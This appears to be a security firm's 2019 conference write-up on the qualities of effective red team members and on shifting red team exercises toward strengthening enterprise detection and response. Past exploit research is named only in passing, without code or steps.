To get standout results in red team exercises, I think member qualities are a pretty decisive factor. Below are a few traits I have observed in our red team colleagues. If you plan to do red team work in the future, or your company is about to build an internal red team, they may serve as a reference.

Imagination

The first is imagination. Why this trait? Because security awareness is gradually improving, one trick can no longer conquer the world, especially in work as varied as red teaming. To get results, you have to combine techniques cleverly or find a bypass.

A concrete example: after we published the details of our Pulse Secure VPN research, someone said on Twitter that they had previously found the key argument injection point used for RCE, but could not exploit it, so the vendor never fixed it. We did find the same spot, but with some imagination we found an exploitable parameter and chained a Perl language quirk into an RCE. Another example comes from our Jenkins research: after bypassing authentication we found a feature that checks whether user-submitted code is syntactically valid. How does a server decide whether syntax is valid? The simplest way is to just try compiling it; if it compiles, the syntax is valid. So we researched ways to achieve command execution at compile time, making the server execute our commands while merely checking whether the syntax was correct. Nobody had described this technique before; it is a classic case of applied imagination.

Imagination has a hidden prerequisite: solid fundamentals. I have always believed imagination is the permutation and combination of knowledge. In the two examples above, without knowledge of Perl's syntax quirks and of meta-programming, no amount of wild thinking would have produced an RCE. Fundamentals plus the courage to make associations and try things are essential traits for a strong red teamer. As for how solid the fundamentals must be: for us, the moment a vulnerability is mentioned, a tree springs to mind: what causes it? The related cases, bugs, and bypasses all pop up one after another. If you can do that, I would say you have achieved a small measure of mastery.

Chasing New Techniques

Chasing new techniques seems to be standard equipment in the security community; our world is bigger than the OWASP Top 10. More bluntly, with only that much knowledge you will not accomplish much in a red team exercise. Here is what I see in our members: reading up on new techniques is a daily habit. When slides from a security conference are released, they read them. When something interests them, they play with it hands-on, often turning it into a tool; many of our internal tools were quietly built up this way. One more point: the ultimate purpose of following new techniques is to apply them, using new techniques on old problems, which often reveals new ways in. For example, we saw the HTTP Desync attack at Black Hat in August this year, and as soon as we got home we applied it to a project we were working on, which opened up additional attack surface. (It is a fun technique: after we poisoned the server, any random visitor browsing the customer's page would execute our JavaScript, no special preconditions needed. Worth studying :p)

Believe… and Persist

The last point I want to share: during research or testing, you sometimes spend a lot of time with nothing to show for it, but if you judge there is a real chance, trust yourself and put in the time. We have an example that took a month: our earlier work on breaking IDA Pro's pseudo-random installation passwords, which unexpectedly became famous in the binary community; someone even wrote a digest of the whole affair. The research question was: without an installation password, could we still install IDA Pro? In the end we managed to reverse the algorithm of IDA's password generator, learning which characters the pseudo-random generator uses and their exact ordering. The difficulty was not purely technical: we had to guess the character set ordering and simultaneously guess which algorithm was used (at least 88 candidates). Each permutation we verified cost half a day and 100 GB of space, so the cumulative cost was high. But experience told us it could succeed, so we committed resources and persisted, and ended up with a very nice result.

This is not an endorsement of stubbornness but of a kind of mental strength: when you are stuck, have enough judgment to abandon a wrong direction decisively, and the courage to persist when the direction is right.

Defense Trends and the Red Team's Next Step

The last part of this article is about the future of red team assessments, and it is the point of this article: what problems do we hope to solve going forward?

As the leading red team vendor, our success rate at getting into Taiwanese enterprises' intranets since we began exercising in 2017 is 100%. We obtained AD administrator privileges in over sixty percent of our engagements, not counting the enterprises that do not use AD for management. We found that once inside the intranet there is usually little resistance; it is as if we had become internal employees who can walk into the server room with a nod. The point I want to make: for a top-tier attack team, getting into an enterprise intranet is not hard. If a top-tier attacker, or a 0-day, shows up, is the enterprise ready? That is the problem we see today.

Defending against attacks is usually discussed along three axes: prevention, detection, and response. Enterprises generally do relatively well at prevention, with fairly good control over known weaknesses. The widespread problem today is detection and response: can the enterprise notice that someone is attacking it? And once it knows it is being attacked, can it respond in time and eradicate the source? These two are done relatively poorly not because enterprises fail to invest in them, but because they are so hard to validate. There is hardly a standard way to confirm whether current mechanisms work or whether purchased appliances do anything, and even if a blue team exists it usually lacks well-developed response SOPs; after all, intrusions do not happen every day.

So we hope enterprises can use red team exercises to train their ability to detect and respond to attacks. Put differently, the essence of a red team assessment is a realistic drill, using attack and defense to help the enterprise understand its weak points. In the past, red team services in Taiwan emphasized finding weaknesses across the whole enterprise. Finding vulnerabilities matters, but against an organization that finds 0-days as often as we do, detection and response are the hard skills that will ultimately save you. From another angle, the most complete catalog of attack strategies and techniques today is the MITRE ATT&CK Framework. An attack operation that damages an enterprise is usually a chain composed of many techniques, and in that framework, finding the initial weakness accounts for less than a tenth of the chain. If an enterprise invests in the ability to detect the other ninety percent of techniques and can break any single link, the entire operation can be made to fail and the assets protected.

What I want to say is that besides being top-tier at finding enterprise vulnerabilities, our red team has accumulated rich intranet penetration experience and techniques, and we are glad to use exercises to help enterprises strengthen real detection and response capabilities. Gradually, the red team of the future will focus more on exercises against the blue team. The emphasis will be on strategy: helping the enterprise learn which attacks it defends against poorly and then improve. Future red teams will also need more experience sparring with defensive mechanisms and understanding the limits of defenses, in order to find the blind spots where appliances are misconfigured or coverage falls short.

Finally, some planning suggestions for enterprises whose defenses are relatively mature; implementing them step by step can raise your security posture a level. (At least in our experience, enterprises that have internalized these concepts are the hardest to attack successfully.)

  • If you have invested in perimeter security for years, start thinking about a defensive strategy for "what if the hacker is already in the intranet"
  • Identify the data that absolutely must not leak, and start practicing the Zero Trust concept there
  • Staff dedicated internal security personnel (a blue team)
  • Work with an experienced red team to review defensive blind spots holistically

Postscript

That is the end of the conference content. I want to close with gratitude. Whether penetration testing or red teaming, neither was something everyone could accept at first, and the value of testing is not for us alone to declare. Along the way we have gradually felt people start to trust us: from the early days, when testing often put us at odds with engineers and network admins, to more and more open-minded customers recently who simply want their problems found. It is quite a contrast. We are deeply grateful for their trust; that mutual trust lets us save time and deliver better results. It is heartening to see Taiwan's IT industry facing problems this positively: a vulnerability that exists, exists; it does not disappear by being ignored, and once you acknowledge it, fixing it is enough. So I ended the talk with this line: "The essence of a red team exercise is not to tell you how fragile you are, but to make sure you can hold the line when real attackers break in." I hope more and more people can face problems head-on, and that this conveys the value we want to deliver.

2019 DEVCORE CONF: thank you to the friends and past collaborators whose participation let the DEVCORE red team evolve. We hope you will join us for the next step. See you next year :)
